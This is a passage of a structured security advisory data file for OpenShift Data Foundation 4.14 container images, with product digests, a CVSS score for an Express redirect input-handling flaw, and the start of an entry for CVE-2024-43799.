"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", flags: [ { label: "vulnerable_code_not_present", 